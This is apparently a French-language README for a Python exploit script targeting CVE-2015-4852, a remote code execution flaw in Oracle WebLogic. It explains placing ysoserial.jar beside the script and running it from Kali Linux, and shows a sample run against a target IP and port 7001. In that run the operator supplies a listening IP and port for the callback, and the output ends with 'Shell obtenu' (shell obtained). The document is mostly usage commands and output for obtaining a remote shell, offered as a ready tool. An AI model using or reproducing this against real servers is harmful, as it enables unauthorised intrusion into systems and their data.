
Script d'exploitation Python pour CVE-2015-4852 (RCE WebLogic) utilisant des payloads ysoserial pour obtenir un accès shell distant sur des serveurs WebLogic vulnérables.
Prérequis : placez ysoserial.jar dans le répertoire du script (renommez ysoserial-0*.jar en ysoserial.jar), il est recommandé d'utiliser Kali Linux pour exécuter ce script.
root@kali:~# python3 CVE-2015-4852.py -h
Usage: python CVE-2015-4852.py -t/--target 1.1.1.1 7001
Options:
-h, --help affiche ce message d'aide et quitte
-t TARGET, --target=TARGET ip port
root@kali:~# python3 CVE-2015-4852.py -t 10.6.214.129 7001
Entrez l'adresse IP d'écoute : 10.6.214.1
Entrez le port d'écoute : 7777
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Exécution réussie
Shell obtenu